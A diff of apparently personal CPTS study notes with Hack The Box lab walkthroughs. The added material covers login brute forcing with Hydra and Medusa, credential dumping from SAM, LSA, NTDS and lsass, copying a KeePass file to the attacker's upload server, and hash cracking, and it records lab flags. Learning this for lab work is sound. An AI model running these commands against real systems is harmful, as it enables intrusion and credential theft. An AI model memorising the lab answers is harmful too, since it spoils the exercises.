diff --git a/docs/brute-forcing.md b/docs/brute-forcing.md
index b2c151817..98593d620 100644
--- a/docs/brute-forcing.md
+++ b/docs/brute-forcing.md
@@ -1,5 +1,5 @@
-
+# Brute forcing
| Method | Description | Example | Best Used When... |
| ------------------------- | ----------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -10,4 +10,74 @@
| `Password Spraying` | Attempts a small set of commonly used passwords against a large number of usernames. | Trying passwords like 'password123' or 'qwerty' against all usernames in an organization. | Account lockout policies are in place, and the attacker aims to avoid detection by spreading attempts across multiple accounts. |
| `Rainbow Table Attack` | Uses pre-computed tables of password hashes to reverse hashes and recover plaintext passwords quickly. | Pre-computing hashes for all possible passwords of a certain length and character set, then comparing captured hashes against the table to find matches. | A large number of password hashes need to be cracked, and storage space for the rainbow tables is available. |
| `Reverse Brute Force` | Targets a single password against multiple usernames, often used in conjunction with credential stuffing attacks. | Using a leaked password from one service to try logging into multiple accounts with different usernames. | A strong suspicion exists that a particular password is being reused across multiple accounts. |
-| `Distributed Brute Force` | Distributes the brute forcing workload across multiple computers or devices to accelerate the process. | Using a cluster of computers to perform a brute-force attack significantly increases the number of combinations that can be tried per second. | The target password or key is highly complex, and a single machine lacks the computational power to crack it within a reasonable timeframe. |
\ No newline at end of file
+| `Distributed Brute Force` | Distributes the brute forcing workload across multiple computers or devices to accelerate the process. | Using a cluster of computers to perform a brute-force attack significantly increases the number of combinations that can be tried per second. | The target password or key is highly complex, and a single machine lacks the computational power to crack it within a reasonable timeframe. |
+
+
+[See Default Credentials Cheat Sheet](default-creds.md)
+
+
+```bash
+ creds search mysql
+```
+
+
+Dictionaries of common admin usernames: https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt
+
+
+|Password Length|Character Set|Possible Combinations|
+|---|---|---|
+|`Short and Simple`|6|Lowercase letters (a-z)|26^6 = 308,915,776|
+|`Longer but Still Simple`|8|Lowercase letters (a-z)|26^8 = 208,827,064,576|
+|`Adding Complexity`|8|Lowercase and uppercase letters (a-z, A-Z)|52^8 = 53,459,728,531,456|
+|`Maximum Complexity`|12|Lowercase and uppercase letters, numbers, and symbols|94^12 = 475,920,493,781,698,549,504|
+
+
+
+
+| Wordlist | Description | Typical Use | Source |
+| --------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | -------------------------------------------------- | ----------------------------------------------------------------------------------------------------------- |
+| `rockyou.txt` | A popular password wordlist containing millions of passwords leaked from the RockYou breach. | Commonly used for password brute force attacks. | [RockYou breach dataset](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) |
+| `top-usernames-shortlist.txt` | A concise list of the most common usernames. | Suitable for quick brute force username attempts. | [SecLists](https://github.com/danielmiessler/SecLists/tree/master) |
+| `xato-net-10-million-usernames.txt` | A more extensive list of 10 million usernames. | Used for thorough username brute forcing. | [SecLists](https://github.com/danielmiessler/SecLists/tree/master) |
+| `2023-200_most_used_passwords.txt` | A list of the 200 most commonly used passwords as of 2023. | Effective for targeting commonly reused passwords. | [SecLists](https://github.com/danielmiessler/SecLists/tree/master) |
+| `Default-Credentials/default-passwords.txt` | A list of default usernames and passwords commonly used in routers, software, and other devices. | Ideal for trying default credentials. | |
+| [darkweb2017-top10000.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/darkweb2017-top10000.txt) | | | https://github.com/danielmiessler/SecLists/blob/master/Passwords/darkweb2017-top10000.txt |
+
+
+Using grep to filter out dictionaries based on password policies. For instance we have the following policies for passwords:
+
+- Minimum length: 8 characters
+- Must include:
+ - At least one uppercase letter
+ - At least one lowercase letter
+ - At least one number
+
+Filtering minimum length of 8 characters:
+
+```shell-session
+grep -E '^.{8,}$' dicionary.txt > dictionary-minlength.txt
+```
+
+At least one uppercase letter:
+
+```shell-session
+grep -E '[A-Z]' dictionary-minlength.txt > dictionary-minlength-uppercase.txt
+```
+
+At least one lowercase letter.
+
+```shell-session
+grep -E '[a-z]' dictionary-minlength-uppercase.txt > dictionary-minlength-uppercase-lowercase.txt
+```
+
+At least one numerical digit
+
+```shell-session
+grep -E '[0-9]' dictionary-minlength-uppercase-lowercase.txt > dictionary-minlength-uppercase-lowercase-number.txt
+```
+
+Or in one step:
+
+```shell-session
+grep -E '^.{6,}$' dictionary.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > dictionary-filtered.txt
+```
\ No newline at end of file
diff --git a/docs/cpts-index.md b/docs/cpts-index.md
index 826313edf..60fef3728 100644
--- a/docs/cpts-index.md
+++ b/docs/cpts-index.md
@@ -25,7 +25,7 @@ tags:
| 12 | Active Directory Enumeration & Attacks | [Active Directory](active-directory.md)
**From Linux:**
- [Enumeration](active-directory-from-linux-enumeration.md),
- [Attacks](active-directory-from-linux-attacks.md),
- [Lateral Movements](active-directory-from-linux-lateral-movement.md),
- [Privilege Escalation](active-directory-from-linux-privilege-escalation.md).
**From Windows:**
- [Enumeration](active-directory-from-windows-enumeration.md),
- [Attacks](active-directory-from-windows-attacks.md),
- [Privilege Escalation](active-directory-from-windows-privilege-escalation.md).
**Tools:**
- [Powershell](powershell.md),
- [Active Directory powershell Module](activedirectory-powershell-module.md),
- [Enumeration with LDAP queries](389-636-ldap.md)
- [PowerView.ps1 from PowerSploit project (powershell)](powerview.md).
- [The ActiveDirectory PowerShell module (powershell)](activedirectory-powershell-module.md).
- [BloodHound (C# and PowerShell Collectors)](bloodhound.md).
- [SharpView (C#)](sharpview.md).
- [kerbrute](kerbrute.md).
- [Crackmapexec](crackmapexec.md).
- [enum4linux](enum4linux.md). | 7 days | Exploitation & Lateral Movement | |
| 13 | Using Web Proxies | [Proxies](proxies.md): [burpsuite](burpsuite.md), [zap-proxy](owasp-zap.md), [proxychains](proxychains.md) | 8 hours | Web Exploitation | |
| 14 | Attacking Web Applications with Ffuf | [ffuf](ffuf.md) | 5 hours | Web Exploitation | |
-| 15 | Login Brute Forcing | | 6 hours | Web Exploitation | |
+| 15 | Login Brute Forcing | [Brute forcing](brute-forcing.md)
[Hydra](hydra.md)
[Medusa](medusa.md)
[Username-anarchy](username-anarchy.md)
[CUPP](cupp-common-user-password-profiler.md)
| 6 hours | Web Exploitation | |
| 16 | SQL Injection Fundamentals | - [Detailed SQLi Cheat sheet for manual attack](sqli-manual-attack.md).
- [SQL injection](webexploitation/sql-injection.md)
- [NoSQL injection](webexploitation/nosql-injection.md)
- [SQLite injections](webexploitation/sqlite-injections.md) | 8 hours | Web Exploitation | |
| 17 | SQLMap Essentials | | 8 hours | Web Exploitation | |
| 18 | Cross-Site Scripting (XSS) | [XSS](webexploitation/cross-site-scripting-xss.md) | 6 hours | Web Exploitation | |
diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md
index 35acd1671..49e702d79 100644
--- a/docs/cpts-labs.md
+++ b/docs/cpts-labs.md
@@ -25,7 +25,6 @@ sudo nmap -sC -sV -p8080 $ip
**Results**: Apache Tomcat
-
**Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.**
```
@@ -2392,7 +2391,7 @@ sudo hashcat -m 1000 c02478537b9727d391bc80011c2e2321 /usr/share/wordlists/rocky
```
# Another way to do it is running crackmapexec from the attacking machine:
-crackmapexec smb 10.129.77.211 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
+crackmapexec smb $ip --local-auth -u bob -p HTB_@cademy_stdnt! --sam
```
Results: matrix
@@ -2401,7 +2400,7 @@ Results: matrix
**RDP to with user "Bob" and password "HTB_@cademy_stdnt!". Dump the LSA secrets on the target and discover the credentials stored. Submit the username and password as the answer. (Format: username:password, Case-Sensitive)**
```
-crackmapexec smb 10.129.77.211 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
+crackmapexec smb $ip --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
```
Results: frontdesk:Password123
@@ -2420,7 +2419,7 @@ Results: lsass.exe
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData ~/borrar
# From the RDP connection open a powershell with Admin rights:
-move C:\Users\HTB-ST~1\AppData\Local\Temp\lsass.DMP \\10.10.15.90\CompData
+move C:\Users\HTB-ST~1\AppData\Local\Temp\lsass.DMP \\$ipKali$\CompData
# Crack the lsass file withPypykatz
pypykatz lsa minidump ~/borrar/lsass.DMP
@@ -2496,10 +2495,10 @@ cd username-anarchy
# Save these names under usernames.txt
# Enumerate services
- sudo nmap -sC -sV 10.129.202.85 -Pn
+ sudo nmap -sC -sV $ip -Pn
# Run a password attack:
-crackmapexec winrm 10.129.202.85 -u ~/borrar/usernames.txt -p /usr/share/wordlists/fasttrack.txt --sam
+crackmapexec winrm $ip -u ~/borrar/usernames.txt -p /usr/share/wordlists/fasttrack.txt --sam
# Results:
SMB 10.129.202.85 445 ILF-DC01 [+] ILF.local\jmarston:P@ssword! (Pwn3d!)
@@ -2513,7 +2512,7 @@ Results: jmarston:P@ssword!
```bash
# Alternative 1: crackmapexec
-crackmapexec smb 10.129.202.85 -u jmarston -p P@ssword! --ntds
+crackmapexec smb $ip-u jmarston -p P@ssword! --ntds
# Crack the hash
hashcat -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.txt
@@ -2523,7 +2522,7 @@ hashcat -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.tx
# Alternative 2
# 1. Connecting to a DC with Evil-WinRM
-evil-winrm -i 10.129.202.85 -u jmarston -p 'P@ssword!'
+evil-winrm -i $ip -u jmarston -p 'P@ssword!'
# 2. Checking Local Group Membership
net localgroup
@@ -2683,7 +2682,7 @@ echo LoveYou1 > originalpass.txt
hashcat --force originalpass.txt -r custom.rule --stdout | sort -u > mutatedlist.list
# Now we launch our attack:
-hydra -l kira -P mutatedlist.list ssh://10.129.229.2
+hydra -l kira -P mutatedlist.list ssh://$ip
# Results: [22][ssh] host: 10.129.229.2 login: kira password: L0vey0u1!
ssh kira@$ip
@@ -2808,7 +2807,7 @@ Results: JuL1()_SH@re_fl@g
```powershell
# We wnumerate the possible IPs for DC fron our RDP connection
-1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}
+1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}
# It might be 172.16.1.10
# In the running RDP connection we have we will open a powershell terminal as julio, by using mimikatz and a passthehash
@@ -2935,11 +2934,11 @@ Results: DONE
```
# Enum services
-nmap -p 22,2222,3389 10.129.32.62
+nmap -p 22,2222,3389 $ip
```
```
-Nmap scan report for 10.129.32.62
+Nmap scan report
Host is up (0.16s latency).
PORT STATE SERVICE
@@ -3179,14 +3178,15 @@ Our client Inlanefreight contracted us to assess individual hosts in their netwo
```powershell
# Enumerate services
-sudo nmap -sC -sV 10.129.202.219 -Pn
+sudo nmap -sC -sV $ip -Pn
# Output: port 21 and 22
# Download the resources files with userlist and password list and generated a mutated list:
hashcat --force password.list -r custom.rule --stdout | sort -u > mutatedlist.list
# Launch a password attack with the username.list and password.list resource provided
-hydra -L username.list -P password.list ftp://10.129.202.219 # output: [21][ftp] host: 10.129.202.219 login: mike password: 7777777
+hydra -L username.list -P password.list ftp://$ip
+# output: [21][ftp] host: $ip login: mike password: 7777777
# Now we access the ftp service with the creds
ftp $ip
@@ -3232,15 +3232,15 @@ sudo nmap -sC -sV $ip -Pn
hashcat --force password.list -r custom.rule --stdout > mut_password.list
# Use a password attack with cracmapexec and the smb service
-crackmapexec smb 10.129.153.184 -u username.list -p mut_password.list
+crackmapexec smb $ip -u username.list -p mut_password.list
# Output: SMB 10.129.153.184 445 SKILLS-MEDIUM [+] \john:123456
# Enumerate samba services with user john
-smbclient -L 10.129.153.184 -U john
+smbclient -L $ip -U john
# Enter password: 123456
# Access the service
-smbclient \\\\10.129.153.184\\SHAREDRIVE -U john
+smbclient \\\\$ip\\SHAREDRIVE -U john
# Enter password: 123456
# Enumerate and download zip file
@@ -3333,11 +3333,121 @@ hydra -l johanna -P unique_passwords.list -t 64 -w 2 -f rdp://$ip
# Connect to the host via RDP
xfreerdp /u:johanna /p:'1231234!' /v:$ip /cert:ignore
+# Browsing around we spot the file Logins.kdbx, a typical keepass file. We will transfer it to our kali machine to try to crack it offline:
+
+# 1. From the kali machine, we will serve the PSUpload.ps1 script
+python3 -m http.server 8001
+
+# 2. From the RDP connection we will download the PSUpload.ps1 to c:\Users\johanna\Documents. Open a powershell
+cd c:\Users\johanna\Documents
+Invoke-WebRequest http://$ipKali:8001/PSUpload.ps1 -Outfile PSUpload.ps1
+
+# 3. From the kali machine, launch uploadserver. It will listen on port 8000
+python3 -m uploadserver
+
+# 4. From the RDP connection, import the PSUpload module and upload the keepass file to our kali attacking machien:
+Import-Module .\PSUpload.ps1
+Invoke-FileUpload -Uri http://$ipAttackingmachien:8000/upload -File C:\Users\johanna\Documents\Logins.kdbx
+
+# From attacking machine, use the module keepass2john to extract a hash:
+keepass2john Logins.kdbx > keepass.hashes
+
+# Launch a dictionary attack:
+john --wordlist=mut_password.list keepass.hashes
+# Output: Qwerty7!
+
+# Now in the RDP connection, open the keepass file and enter the masterkey. You will access to the creds:
+# david:gRzX7YbeTcDG7
+
+# With these creds we can access the samba share service. We enumerate and access
+smbmap -H $ip -U david
+smbclient \\\\$ip\\david -U david
+
+# We list and note an interesting file. Download it.
+dir
+get Backup.vhd
+
+# Now we will try to crack it. First we will extract the hashes
+bitlocker2john -i Backup.vhd > backup.hashes
+grep "bitlocker\$0" backup.hashes > backup.hash
+
+# And now we crack it
+hashcat -m 22100 backup.hash mut_password.list -o backup.cracked
+cat backup.cracked
+# Output: 123456789!
+
+
+# Install the libguestfs-tools package, which provides tools for accessing and manipulating virtual disk images (e.g., .vhd files).
+sudo apt-get install libguestfs-tools
+
+# Install the cifs-utils package, which is used for mounting SMB (CIFS) network shares.
+sudo apt-get install cifs-utils
+
+# Install the dislocker package, which is used for accessing BitLocker-encrypted drives on Linux.
+sudo apt install dislocker
+
+# Create directories where the BitLocker volume and its decrypted contents will be mounted.
+sudo mkdir /media/backup_bitlocker /media/mount
+
+# Attach the .vhd file located at /mnt/smbshare/backup.vhd to a loop device (/dev/loop100)
+# and scan for partitions (using the -P flag).
+sudo losetup -P /dev/loop100 /mnt/smbshare/backup.vhd
+
+# Use dislocker to unlock the BitLocker-encrypted partition (/dev/loop100p2).
+# The -v flag enables verbose output, -V specifies the BitLocker partition,
+# and -u prompts for the BitLocker password. The decrypted data is mounted to /media/backup_bitlocker.
+sudo dislocker -v -V /dev/loop100p2 -u -- /media/backup_bitlocker
+
+# Mount the dislocker-file (the virtual decrypted representation of the BitLocker drive) as a loop device and make it writable. The contents will be accessible at /media/mount.
+sudo mount -o loop,rw /media/backup_bitlocker/dislocker-file /media/mount
+
+# List the contents of the decrypted and mounted BitLocker volume to verify the files are accessible.
+ls -la /media/mount
```
-Results:
+```
+# Output
+total 19104
+drwxrwxrwx 1 root root 0 Feb 11 2022 '$RECYCLE.BIN'
+drwxrwxrwx 1 root root 4096 Feb 11 2022 .
+drwxr-xr-x 6 root root 4096 Jan 20 17:25 ..
+-rwxrwxrwx 1 root root 77824 Feb 11 2022 SAM
+-rwxrwxrwx 1 root root 19472384 Feb 11 2022 SYSTEM
+drwxrwxrwx 1 root root 4096 Feb 11 2022 'System Volume Information'
+```
+
+
+```
+# We can use secretsdump to extract the hives:
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
+```
+
+```
+[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
+[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9e73cc8353847cfce7b5f88061103b43:::
+sshd:1000:aad3b435b51404eeaad3b435b51404ee:6ba6aae01bae3868d8bf31421d586153:::
+david:1009:aad3b435b51404eeaad3b435b51404ee:b20d19ca5d5504a0c9ff7666fbe3ada5:::
+johanna:1010:aad3b435b51404eeaad3b435b51404ee:0b8df7c13384227c017efc6db3913374:::
+[*] Cleaning up...
+```
+
+```
+# Cracking the Administrator NTLM
+hashcat -m 1000 e53d4d912d96874e83429886c7bf22a1 mut_passwords.list
+# Output: Liverp00l8!
+# Access with RDP
+xfreerdp /u:Administrator /p:'Liverp00l8!' /v:$ip /cert:ignore
+
+# Open the flag.txt in the Desktop
+```
+
+Results: HTB{PWcr4ck1ngokokok}
@@ -6222,6 +6332,183 @@ Results: HTB{w3b_fuzz1n6_m4573r}
## [Login Brute Forcing](https://academy.hackthebox.com/module/details/57)
+### Brute Force Attacks
+
+**After successfully brute-forcing the PIN, what is the full flag the script returns?**
+
+Run the provided script. Also you can do it from Burpsuite.
+
+Results: HTB{Brut3_F0rc3_1s_P0w3rfu1}
+
+
+**After successfully brute-forcing the target using the script, what is the full flag the script returns?**
+
+Run the provided script. Also you can do it from Burpsuite.
+
+HTB{Brut3_F0rc3_M4st3r}
+
+
+### Hydra
+
+**Basic HTTP Authentication- After successfully brute-forcing, and then logging into the target, what is the full flag you find?**
+
+```
+hydra -l basic-auth-user -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt 94.237.63.111 -s 32110 http-get /
+```
+
+Results: HTB{th1s_1s_4_f4k3_fl4g}
+
+**Login Forms- After successfully brute-forcing, and then logging into the target, what is the full flag you find?**
+
+```bash
+hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt -f 94.237.63.111 -s 47017 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
+# Output: [47017][http-post-form] host: 94.237.63.111 login: admin password: zxcvbnm
+
+```
+
+Results: HTB{W3b_L0gin_Brut3F0rc3}
+
+
+### Medusa
+
+What was the password for the ftpuser?
+
+```
+medusa -u sshuser -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt -M ssh -h 83.136.253.44 -n 45938 -t 3
+# Output: 2025-01-20 19:57:42 ACCOUNT FOUND: [ssh] Host: 83.136.253.44 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
+
+# Connect via ssh
+ssh sshuser@83.136.253.44 -p 45938
+
+# Reconnaissance
+nmap localhost
+
+# From the local target machine:
+medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5
+# Output: ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
+
+# From the target machine connect to FTP
+ftp ftpuser@$ip
+# Enter password: qqww1122
+dir
+get flag.txt
+quit
+
+cat flag.txt
+```
+
+Results: qqww1122
+
+**After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?**
+
+Results: HTB{SSH_and_FTP_Bruteforce_Success}
+
+
+### Custom Wordlists
+
+**After successfully brute-forcing, and then logging into the target, what is the full flag you find?**
+
+
+```
+# Generate usernames
+./username-anarchy Jane Smith > jane_smith_usernames.txt
+
+# Generate passwords
+cupp -i
+```
+
+```
+Output
+> First Name: Jane
+> Surname: Smith
+> Nickname: Janey
+> Birthdate (DDMMYYYY): 11121990
+
+
+> Partners) name: Jim
+> Partners) nickname: Jimbo
+> Partners) birthdate (DDMMYYYY): 12121990
+
+
+> Child's name:
+> Child's nickname:
+> Child's birthdate (DDMMYYYY):
+
+
+> Pet's name: Spot
+> Company name: AHI
+
+
+> Do you want to add some key words about the victim? Y/[N]: y
+> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: hacker,juice,black], spaces will be removed: hacker,blue
+> Do you want to add special chars at the end of words? Y/[N]: y
+> Do you want to add some random numbers at the end of words? Y/[N]:y
+> Leet mode? (i.e. leet = 1337) Y/[N]: y
+
+[+] Now making a dictionary...
+[+] Sorting list and removing duplicates...
+[+] Saving dictionary to jane.txt, counting 52058 words.
+[+] Now load your pistolero with jane.txt and shoot! Good luck!
+```
+
+```
+# Filter passwords
+grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > dictionary-filtered.txt
+
+# Launch hydra attack:
+hydra -L jane_smith_usernames.txt -P dictionary-filtered.txt 94.237.50.7 -s 32234 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
+
+# Output: [32234][http-post-form] host: 94.237.50.7 login: jane password: 3n4J!!
+
+# Login into the target
+```
+
+Results: HTB{W3b_L0gin_Brut3F0rc3_Cu5t0m}
+
+
+### Skills Assessment Part 1
+
+The first part of the skills assessment will require you to brute-force the the target instance. Successfully finding the correct login will provide you with the username you will need to start Skills Assessment Part 2.
+
+**What is the password for the basic auth login?**
+
+```bash
+# We have the provided lists: usernames.txt and passwords.txt
+hydra -L usernames.txt -P passwords.txt -f 83.136.253.44 -s 44641 http-get
+
+# Output: [44641][http-get] host: 83.136.253.44 login: admin password: Admin123
+
+```
+
+
+Results: Admin123
+
+**After successfully brute forcing the login, what is the username you have been given for the next part of the skills assessment?**
+
+```bash
+# Access the site with user and password and the name is retrieved
+```
+
+Results: satwossh
+
+
+
+### Skills Assessment Part 2
+
+This is the second part of the skills assessment. `YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS`. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance.
+
+What is the username of the ftp user you find via brute-forcing?
+
+```
+sudo nmap -sV -sC $ip -Pn -p-
+
+```
+
+
+What is the flag contained within flag.txt
+
+
+
## [SQL Injection Fundamentals](https://academy.hackthebox.com/module/details/33)
### MySQL
diff --git a/docs/htb-cascade.md b/docs/htb-cascade.md
new file mode 100644
index 000000000..75f7eb13c
--- /dev/null
+++ b/docs/htb-cascade.md
@@ -0,0 +1,409 @@
+---
+title: CAscade - A HackTheBox machine
+author: amandaguglieri
+draft: false
+TableOfContents: true
+tags:
+ - walkthrough
+ - active
+ - directory
+ - windows
+ - medium
+---
+# HTB Cascade
+
+## user.txt
+
+Enumerate:
+
+```bash
+ sudo nmap -sC -sV $ip -Pn --top-ports 10000
+```
+
+Results:
+
+```
+Host is up (0.037s latency).
+Not shown: 8353 filtered tcp ports (no-response)
+PORT STATE SERVICE VERSION
+53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
+| dns-nsid:
+|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
+88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 19:01:30Z)
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
+445/tcp open microsoft-ds?
+636/tcp open tcpwrapped
+3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
+3269/tcp open tcpwrapped
+5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+49154/tcp open msrpc Microsoft Windows RPC
+49155/tcp open msrpc Microsoft Windows RPC
+49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+49158/tcp open msrpc Microsoft Windows RPC
+49165/tcp open msrpc Microsoft Windows RPC
+Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
+
+Host script results:
+| smb2-security-mode:
+| 2:1:0:
+|_ Message signing enabled and required
+|_clock-skew: -7m01s
+| smb2-time:
+| date: 2025-01-13T19:02:22
+|_ start_date: 2025-01-13T18:56:18
+
+```
+
+We enumerate users:
+
+```bash
+crackmapexec smb $ip --users
+```
+
+Results:
+
+```
+SMB 10.129.67.96 445 CASC-DC1 [+] Enumerated domain user(s)
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\CascGuest Built-in account for guest access to the computer/domain
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\arksvc
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\s.smith
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\r.thompson
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\util
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\j.wakefield
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\s.hickson
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\j.goodhand
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\a.turnbull
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\e.crowe
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\b.hanson
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\d.burman
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\BackupSvc
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\j.allen
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\i.croft
+```
+
+
+
+
+```
+~/tools/kerbrute/dist/kerbrute_linux_amd64 userenum -d cascade.local --dc $ip ~/borrar/users.txt
+
+```
+
+
+
+
+```
+python3 ~/tools/impacket/examples/GetNPUsers.py CASCADE.LOCAL/ -dc-ip $ip -no-pass -usersfile ~/borrar/users.txt | grep -v SessionError
+
+
+python3 ~/tools/impacket/examples/GetNPUsers.py --dc-ip $ip CASCADE.LOCAL/Backupsvc -request
+```
+
+
+
+
+```
+ldapsearch -x -H ldaps://$ip -b "DC=CASCADE,DC=LOCAL" "(objectClass=user)"
+
+ldapsearch -x -H ldap://$ip -b "DC=CASCADE,DC=LOCAL" "(objectClass=user)" cn mail sAMAccountName
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
diff --git a/docs/hydra.md b/docs/hydra.md
index 47962497b..decf67405 100644
--- a/docs/hydra.md
+++ b/docs/hydra.md
@@ -65,13 +65,34 @@ hydra -U http-post-form
hydra -l pentester -P /usr/share/wordlists/metasploit/password.lst zev0nlxhh78mfshrhzvq9h8vm.eu-central-4.attackdefensecloudlabs.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:S=Success"
+# Another example of a login form:
+hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 94.237.63.111 -s 47017 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
+# username=^USER^&password=^PASS^: The form parameters with placeholders for Hydra.
+# F=Invalid credentials: The failure condition – Hydra will consider a login attempt unsuccessful if it sees this string in the response.
+
+
+
# Example for ftp in a non default port
hydra -L users.txt -P pass.txt ftp://$ip:2121
+# Port: Specify a non-default port for the target service.
+hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp
+# Target the FTP service on ftp.example.com via port 2121.
+# Use the ftp module and provide verbose output (-V) for detailed monitoring.
+
+
# Attacking a pop3 service
hydra -L users.txt -p 'Company01!' -f $ip pop3
+# Tasks: Define the number of parallel tasks (threads) to run, potentially speeding up the attack.
+hydra -t 4 ...
+
+# Targeting Multiple SSH Servers
+hydra -l $username -p $password -M targets.txt ssh
+
+# Testing a RDP connection with a username Administrator and a password consisting of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers
+hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
```
@@ -86,3 +107,16 @@ hydra 192.168.1.45 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/P
hydra -l student -P /usr/share/wordlists/rockyou.txt ssh://192.153.213.3
```
+
+| Hydra Service | Service/Protocol | Description | Example Command |
+| ------------- | -------------------------------- | ------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- |
+| ftp | File Transfer Protocol (FTP) | Used to brute-force login credentials for FTP services, commonly used to transfer files over a network. | `hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100` |
